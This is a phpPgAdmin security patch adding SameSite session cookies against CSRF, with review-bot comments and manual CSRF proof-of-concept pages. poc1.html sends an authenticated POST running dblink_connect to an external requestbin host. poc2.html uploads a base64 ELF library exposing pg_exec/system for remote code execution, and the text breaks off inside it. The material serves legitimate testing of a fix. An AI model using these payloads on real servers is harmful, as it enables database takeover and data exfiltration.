phpPgAdmin/csrf-samesite-fix.patch


Index: classes/Misc.php
===================================================================
--- classes/Misc.php.orig
+++ classes/Misc.php
@@ -1333,6 +1333,10 @@
$server_info = $this->getServerInfo();
$reqvars = $this->getRequestVars('table');
+ if (!$conf['extra_session_security']) {
+ echo '<div class="alert-banner"><p><a href="http://phppgadmin.sourceforge.net/doku.php?id=faq#other_questions" target="_blank" rel="noopener noreferrer">', htmlspecialchars($lang['sessionsecuritywarning']), '</a></p></div>';
+ }
+
echo "<div class=\"topbar\"><table style=\"width: 100%\"><tr><td>";
if ($server_info && isset($server_info['platform']) && isset($server_info['username'])) {
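Review bot: The new banner test at the top of this hunk reads `$conf['extra_session_security']` directly, which emits an undefined-index notice on installs whose config.inc.php predates the new key; `if (empty($conf['extra_session_security'])) {` is notice-free and still shows the warning when the key is absent, which is the safe outcome. Whether `$conf` and `$lang` are in scope here cannot be seen from the hunk — the enclosing method starts outside it — so please confirm it already declares `global $conf, $lang;` (as the other Misc methods presumably do) before relying on them. The escaping of the banner text via htmlspecialchars() is correct and should stay.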
Index: conf/config.inc.php-dist
===================================================================
--- conf/config.inc.php-dist.orig
+++ conf/config.inc.php-dist
@@ -89,6 +89,15 @@
// your browser preference.
$conf['default_lang'] = 'auto';
+ // If extra session security is true, then PHP's session cookies will have
+ // SameSite cookie flags set to prevent CSRF attacks. If you're using
+ // auto-start sessions, autostarted sessions will be destroyed and
+ // restarted with SameSite on. If this this solution is not acceptable for
+ // your situation, you will need to either turn off auot-start sessions, or
+ // turn off secure sessions. Versions of PHP below 7.3 do not have access
+ // to this feature and will be vulnerable to CSRF attacks.
+ $conf['extra_session_security'] = true;
+
// AutoComplete uses AJAX interaction to list foreign key values
// on insert fields. It currently only works on single column
// foreign keys. You can choose one of the following values:
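Review bot: The new comment has two typos at the fourth and fifth lines, `If this this solution` → `If this solution` and `auot-start` → `auto-start`. Its last sentence also no longer matches lib.inc.php, which with this option on refuses to start under PHP < 7.3 rather than running vulnerable; suggest `// PHP versions before 7.3 cannot set SameSite on the session cookie; with this option on, phpPgAdmin refuses to run on them.` It may be worth stating here that installs upgraded without this key fall back to the old, unprotected session start.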
Index: lang/english.php
===================================================================
--- lang/english.php.orig
+++ lang/english.php
@@ -807,6 +807,7 @@
$lang['strloading'] = 'Loading...';
$lang['strerrorloading'] = 'Error Loading';
$lang['strclicktoreload'] = 'Click to reload';
+ $lang['sessionsecuritywarning'] = 'You are running phpPgAdmin without session security.';
// Autovacuum
$lang['strautovacuum'] = 'Autovacuum';
Index: libraries/lib.inc.php
===================================================================
--- libraries/lib.inc.php.orig
+++ libraries/lib.inc.php
@@ -50,11 +50,36 @@
require_once('./classes/Misc.php');
$misc = new Misc();
- // Start session (if not auto-started)
- if (!ini_get('session.auto_start')) {
- session_name('PPA_ID');
- session_start();
- }
+ // Session start: if extra_session_security is on, make sure cookie_samesite
+ // is on (exit if we fail); otherwise, just start the session
+ $our_session_name = 'PPA_ID';
+ if ($conf['extra_session_security']) {
+ if (version_compare(phpversion(), '7.3', '<')) {
+ exit('PHPPgAdmin cannot be fully secured while running under PHP versions before 7.3. Please upgrade PHP if possible. If you cannot upgrade, and you\'re willing to assume the risk of CSRF attacks, you can change the value of "extra_session_security" to false in your config.inc.php file.');
+ }
+ if (ini_get('session.auto_start')) {
+ // If session.auto_start is on, and the session doesn't have
+ // session.cookie_samesite set, destroy and re-create the session
+ if (session_name() !== $our_session_name) {
+ $setting = strtolower(ini_get('session.cookie_samesite'));
+ if ($setting !== 'lax' && $setting !== 'strict') {
+ session_destroy();
+ session_name($our_session_name);
+ ini_set('session.cookie_samesite', 'Strict');
+ session_start();
+ }
+ }
+ } else {
+ session_name($our_session_name);
+ ini_set('session.cookie_samesite', 'Strict');
+ session_start();
+ }
+ } else {
+ if (!ini_get('session.auto_start')) {
+ session_name($our_session_name);
+ session_start();
+ }
+ }
// Do basic PHP configuration checks
if (ini_get('magic_quotes_gpc')) {
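Review bot: The return value of `ini_set('session.cookie_samesite', 'Strict')` is ignored at both call sites even though the hunk's header comment promises "exit if we fail", so an environment where the directive cannot be changed at runtime silently starts a session without SameSite. The `session_name() !== $our_session_name` gate in the auto_start branch is also the wrong test: if php.ini already names the auto-started session PPA_ID, the cookie_samesite check is skipped entirely and nothing is enforced; the decision should rest on the cookie flag alone. Since `$conf['extra_session_security']` is undefined on installs upgraded with an old config.inc.php, the outer test evaluates false and takes the unprotected path — `if (!isset($conf['extra_session_security']) || $conf['extra_session_security']) {` would fail closed instead. The rewrite below drops the name check and aborts when ini_set reports failure; the rest of the script continues outside the hunk. SameSite is a browser-enforced control that older user agents ignore, so a comment noting that a per-request token would be the more robust defence is worth adding.
```php
if ($conf['extra_session_security']) {
    // … unchanged: PHP < 7.3 version check …
    if (ini_get('session.auto_start')) {
        // Decide by the actual cookie flag, not by the session name:
        // an auto-started session already called PPA_ID still lacks SameSite.
        $setting = strtolower((string) ini_get('session.cookie_samesite'));
        if ($setting !== 'lax' && $setting !== 'strict') {
            session_destroy();
            session_name($our_session_name);
            if (ini_set('session.cookie_samesite', 'Strict') === false) {
                exit('Unable to enable SameSite session cookies; refusing to start an unprotected session.');
            }
            session_start();
        }
    } else {
        session_name($our_session_name);
        if (ini_set('session.cookie_samesite', 'Strict') === false) {
            exit('Unable to enable SameSite session cookies; refusing to start an unprotected session.');
        }
        session_start();
    }
} else {
    // … unchanged: legacy session start …
}
```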
Index: tests/manual/issue-94/README.md
===================================================================
--- /dev/null
+++ tests/manual/issue-94/README.md
@@ -0,0 +1,42 @@
+# Testing CSRF vulnerabilities (Issue #94)
+
+How to test:
+
+1. Start phppgadmin:
+
+```
+$ cd /path/to/phppgadmin
+$ php -S localhost:8000
+```
+
+2. Set up a testing domain in /etc/hosts:
+
+```
+127.0.0.1 localhost2
+```
+
+3. Start the tests
+
+```
+$ cd /path/to/phppgadmin/tests/manual/issue-94
+$ php -S localhost2:8001
+```
+
+4. Open both sites in the same browser (different windows or tabs):
+
+```
+http://localhost:8000
+```
+
+```
+http://localhost2:8001
+```
+
+5. Log in to phppgadmin
+
+6. Run a test
+
+Choose a test from the list. Open your console, and click "Submit Request" -- you should see a CORS error, but the request should also appear in the network tab. Open it to see the response.
+
+If you see a login page, phppgadmin is protected. If not, phppgadmin is vulnerable.
+
Index: tests/manual/issue-94/index.html
===================================================================
--- /dev/null
+++ tests/manual/issue-94/index.html
@@ -0,0 +1,12 @@
+<html>
+<head>
+<title>Issue #94 (CSRF vulnerabilities) proof of concepts</title>
+</head>
+<body>
+<h1>Issue #94: CSRF vulnerabilities</h1>
+<ul>
+<li><a href="poc1.html">Proof of concept #1: out of band technique</a></li>
+<li><a href="poc2.html">Proof of concept #2: remote code execution</a></li>
+<ul>
+</body>
+</html>
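Review bot: The list is never closed — the line after the second `<li>` opens a second `<ul>` instead of closing the first; it should read `</ul>`. Browsers will render it anyway, but the page is invalid and any later addition to the list will nest unexpectedly.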
Index: tests/manual/issue-94/poc1.html
===================================================================
--- /dev/null
+++ tests/manual/issue-94/poc1.html
@@ -0,0 +1,48 @@
+<html>
+<body>
+<script>
+function submitRequest() {
+ var xhr = new XMLHttpRequest();
+ xhr.open("POST", "http:\/\/localhost:8000\/sql.php", true);
+ xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+ xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
+ xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------317222262731323");
+ xhr.withCredentials = true;
+ var body = "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"query\"\r\n" +
+ "\r\n" +
+ "CREATE EXTENSION dblink;\r\n" +
+ "SELECT dblink_connect(\'host=mydatahere.b940ab686a17804777c0.d.requestbin.net user=postgres password=password dbname=dvdrental\');\r\n" +
+ "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
+ "\r\n" +
+ "2097152\r\n" +
+ "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"script\"; filename=\"\"\r\n" +
+ "Content-Type: application/octet-stream\r\n" +
+ "\r\n" +
+ "\r\n" + "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"execute\"\r\n" +
+ "\r\n" +
+ "Execute\r\n" +
+ "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"server\"\r\n" +
+ "\r\n" +
+ "localhost:5432:allow\r\n" +
+ "-----------------------------317222262731323\r\n" +
+ "Content-Disposition: form-data; name=\"database\"\r\n" +
+ "\r\n" +
+ "postgres\r\n" +
+ "-----------------------------317222262731323--\r\n";
+ var aBody = new Uint8Array(body.length);
+ for (var i = 0; i < aBody.length; i++) {
+ aBody[i] = body.charCodeAt(i);
+ }
+ xhr.send(new Blob([aBody]));
+}
+</script>
+<form action="#">
+ <input type="button" value="Submit request" onclick="submitRequest();" />
+</form>
+</body>
+</html>
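Review bot: The query bodies of this file and of poc2.html carry working payloads against hard-coded external hosts (the dblink_connect line here, and the lo_export/CREATE FUNCTION/sys() sequence in poc2.html), which is more than a manual CSRF check needs. The test only has to show whether sql.php accepts a cross-site POST with an authenticated session, so a harmless statement such as `SELECT 1;` in the `query` field demonstrates the same thing without leaving runnable exploit pages under tests/manual, a directory that may end up inside the served document root. If the full payloads are kept for some reason, the README should say so and the release packaging should exclude the tests tree.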
Index: tests/manual/issue-94/poc2.html
===================================================================
--- /dev/null
+++ tests/manual/issue-94/poc2.html
@@ -0,0 +1,53 @@
+<html>
+<body>
+<script>history.pushState('', '', '/')</script> <script>
+ function submitRequest() {
+ var xhr = new XMLHttpRequest();
+ xhr.open("POST", "http:\/\/localhost:8000\/sql.php", true);
+ xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
+ xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
+ xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------297112967428312");
+ xhr.withCredentials = true;
+ var body = "-----------------------------297112967428312\r\n" +
+ "Content-Disposition: form-data; name=\"query\"\r\n" +
+ "\r\n" +
+ "SELECT lo_create(43213);\r\n" +
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 0, decode(\'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\', \'base64\'));\r\n" +
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 1, decode(\'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAGAAAAAAAAI AYAAAAAAAABAAAAAAAAAIcAAAAAAAAADAAAAAAAAABABQAAAAAAAA0AAAAAAAAAsAYAAAAAAAAZAAAAAAAAABAOIAAAAAAA GwAAAAAAAAAIAAAAAAAAABoAAAAAAAAAGA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAA AiAMAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAAC1AAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAA AAAgAAAAAAAAAYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAACgFAAAAAAAABwAAAAAAAACABAAAAAAAAAgAAAAAA AAAqAAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABgBAAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAAD4EAAAA AAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\', \'base64\'));\r\n" +
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 2, decode(\'IA4gAAAAAAAAAAAAAAAAAAAAAAAAAAAAdgUAAAAAAAAgECAAAAAAAEdDQzogKFVidW50dSA3LjMuMC0xNnVidW 50dTMpIDcuMy4wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwABAMgBAAAAAAAAAAAAAAAAAAAAAAAAAwACA PABAAAAAAAAAAAAAAAAAAAAAAAAAwADADgCAAAAAAAAAAAAAAAAAAAAAAAAAwAEAIgDAAAAAAAAAAAAAAAAAAAAAAAAAwAF AD4EAAAAAAAAAAAAAAAAAAAAAAAAAwAGAGAEAAAAAAAAAAAAAAAAAAAAAAAAAwAHAIAEAAAAAAAAAAAAAAAAAAAAAAAAAwA IACgFAAAAAAAAAAAAAAAAAAAAAAAAAwAJAEAFAAAAAAAAAAAAAAAAAAAAAAAAAwAKAGAFAAAAAAAAAAAAAAAAAAAAAAAAAw ALAIAFAAAAAAAAAAAAAAAAAAAAAAAAAwAMAJAFAAAAAAAAAAAAAAAAAAAAAAAAAwANALAGAAAAAAAAAAAAAAAAAAAAAAAAA wAOAMAGAAAAAAAAAAAAAAAAAAAAAAAAAwAPAOAGAAAAAAAAAAAAAAAAAAAAAAAAAwAQABgHAAAAAAAAAAAAAAAAAAAAAAAA AwARABAOIAAAAAAAAAAAAAAAAAAAAAAAAwASABgOIAAAAAAAAAAAAAAAAAAAAAAAAwATACAOIAAAAAAAAAAAAAAAAAAAAAA AAwAUAOAPIAAAAAAAAAAAAAAAAAAAAAAAAwAVAAAQIAAAAAAAAAAAAAAAAAAAAAAAAwAWACAQIAAAAAAAAAAAAAAAAAAAAA AAAwAXACgQIAAAAAAAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAAAMA AAAAgAMAJAFAAAAAAAAAAAAAAAAAAAOAAAAAgAMANAFAAAAAAAAAAAAAAAAAAAhAAAAAgAMACAGAAAAAAAAAAAAAAAAAAA3 AAAAAQAXACgQIAAAAAAAAQAAAAAAAABGAAAAAQASABgOIAAAAAAAAAAAAAAAAABtAAAAAgAMAGAGAAAAAAAAAAAAAAAAAAB 5AAAAAQARABAOIAAAAAAAAAAAAAAAAACYAAAABADx/wAAAAAAAAAAAAAAAAAAAACiAAAAAQAOAMAGAAAAAAAAHAAAAAAAAA C1AAAAAQAOANwGAAAAAAAABAAAAAAAAAABAAAABADx/wAAAAAAAAAAAAAAAAAAAADDAAAAAQAQANAHAAAAAAAAAAAAAAAAA AAAAAAABADx/wAAAAAAAAAAAAAAAAAAAADRAAAAAQAWACAQIAAAAAAAAAAAAAAAAADeAAAAAQATACAOIAAAAAAAAAAAAAAA AADnAAAAAAAPAOAGAAAAAAAAAAAAAAAAAAD6AAAAAQAWACgQIAAAAAAAAAAAAAAAAAAGAQAAAQAVAAAQIAAAAAAAAAAAAAA AAAAcAQAAEgAMAGoGAAAAAAAADQAAAAAAAAAqAQAAIAAAAAAAAAAAAAAAAAAAAAAAAABGAQAAEAAWACgQIAAAAAAAAAAAAA AAAABNAQAAEgANALAGAAAAAAAAAAAAAAAAAABTAQAAEgAAAAAAAAAAAAAAAAAAAAAAAABnAQAAIAAAAAAAAAAAAAAAAAAAA AAAAACQAQAAEgAMAIQGAAAAAAAAKgAAAAAAAAB2AQAAEAAXADAQIAAAAAAAAAAAAAAAAAB7AQAAEAAXACgQIAAAAAAAAAAA AAAAAACHAQAAEgAMAHcGAAAAAAAADQAAAAAAAACYAQAAIAAAAAAAAAAAAAAAAAAAAAAAAACyAQAAIgAAAAAAAAAAAAAAAAA 
AAAAAAADOAQAAEgAJAEAFAAAAAAAAAAAAAAAAAAAAY3J0c3R1ZmYuYwBkZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2 JhbF9kdG9yc19hdXgAY29tcGxldGVkLjc2OTYAX19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhb WVfZHVtbXkAX19mcmFtZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AHBnX2V4ZWMuYwBQZ19tYWdpY19kYXRhLjQ3NzkAbXlf ZmluZm8uNDc4OABfX0ZSQU1FX0VORF9fAF9fZHNvX2hhbmRsZQBfRFlOQU1JQwBfX0dOVV9FSF9GUkFNRV9IRFIAX19UTUN fRU5EX18AX0dMT0JBTF9PRkZTRVRfVEFCTEVfAFBnX21hZ2ljX2Z1bmMAX0lUTV9kZXJlZ2lzdGVyVE1DbG9uZVRhYmxlAF 9lZGF0YQBfZmluaQBzeXN0ZW1AQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAF9lbmQAX19ic3Nfc3RhcnQAcGdfZmluZ m9fcGdfZXhlYwBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplQEBHTElCQ18yLjIuNQBfaW5pdAAA LnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgA uZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEuZHluAC5yZWxhLnBsdAAuaW5pdAAucGx0Lmc=\', \'base64\'));\r\n" +
+ "INSERT INTO pg_largeobject (loid, pageno, data) values (43213, 3, decode(\'b3QALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV 9hcnJheQAuZHluYW1pYwAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAABwAAAAIAAAAAAAAAyAEAAAAAAADIAQAAAAAA ACQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAALgAAAPb//28CAAAAAAAAAPABAAAAAAAA8AEAAAAAAABEAAAAAAA AAAMAAAAAAAAACAAAAAAAAAAAAAAAAAAAADgAAAALAAAAAgAAAAAAAAA4AgAAAAAAADgCAAAAAAAAUAEAAAAAAAAEAAAAAQ AAAAgAAAAAAAAAGAAAAAAAAABAAAAAAwAAAAIAAAAAAAAAiAMAAAAAAACIAwAAAAAAALUAAAAAAAAAAAAAAAAAAAABAAAAA AAAAAAAAAAAAAAASAAAAP///28CAAAAAAAAAD4EAAAAAAAAPgQAAAAAAAAcAAAAAAAAAAMAAAAAAAAAAgAAAAAAAAACAAAA AAAAAFUAAAD+//9vAgAAAAAAAABgBAAAAAAAAGAEAAAAAAAAIAAAAAAAAAAEAAAAAQAAAAgAAAAAAAAAAAAAAAAAAABkAAA ABAAAAAIAAAAAAAAAgAQAAAAAAACABAAAAAAAAKgAAAAAAAAAAwAAAAAAAAAIAAAAAAAAABgAAAAAAAAAbgAAAAQAAABCAA AAAAAAACgFAAAAAAAAKAUAAAAAAAAYAAAAAAAAAAMAAAAVAAAACAAAAAAAAAAYAAAAAAAAAHgAAAABAAAABgAAAAAAAABAB QAAAAAAAEAFAAAAAAAAFwAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABzAAAAAQAAAAYAAAAAAAAAYAUAAAAAAABg BQAAAAAAACAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAfgAAAAEAAAAGAAAAAAAAAIAFAAAAAAAAgAUAAAAAAAA IAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAIcAAAABAAAABgAAAAAAAACQBQAAAAAAAJAFAAAAAAAAHgEAAAAAAA AAAAAAAAAAABAAAAAAAAAAAAAAAAAAAACNAAAAAQAAAAYAAAAAAAAAsAYAAAAAAACwBgAAAAAAAAkAAAAAAAAAAAAAAAAAA AAEAAAAAAAAAAAAAAAAAAAAkwAAAAEAAAACAAAAAAAAAMAGAAAAAAAAwAYAAAAAAAAgAAAAAAAAAAAAAAAAAAAAEAAAAAAA AAAAAAAAAAAAAJsAAAABAAAAAgAAAAAAAADgBgAAAAAAAOAGAAAAAAAANAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAA AAACpAAAAAQAAAAIAAAAAAAAAGAcAAAAAAAAYBwAAAAAAALwAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAswAAAA 4AAAADAAAAAAAAABAOIAAAAAAAEA4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAL8AAAAPAAAAAwAAA 